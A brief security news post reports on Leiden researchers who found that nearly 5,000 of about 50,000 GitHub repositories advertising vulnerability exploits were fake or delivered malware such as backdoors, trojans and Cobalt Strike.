Fake Proof of Concept exploits for vulnerabilities, containing malware found on GitHub

Researchers at Leiden Institute of Advanced Computer Science find many fake proof-of-concept (PoC) exploits for vulnerabilities on GitHub, many of them including malware.

GitHub is a very well-known repository for hosting source-code. Some of the repositories are intentionally made public, with then objective to share code and possibly also allow users to contribute with their own code.

The platform is also used by security researchers to publish their Proof of Concept (PoC) exploitation toolkits, with the intention to help the security community to verify the presence of vulnerabilities, determine the impact and scope of a flaw and verify the effectiveness of remediation actions.

Researchers at Leiden Institute of Advanced Computer Science analyzed nearly 50.000 repositories that advertised an exploit for vulnerabilities and identified nearly 5000 repositories that were either fake or stealthily delivering malicious code or scripts.

Interesting cases involved the presence of malicious tools, ranging from remote access backdoors, obfuscated Python scripts, JavaScript trojans, VBScripts, information stealers and even Cobalt Strike. 

The Bleeping Computer article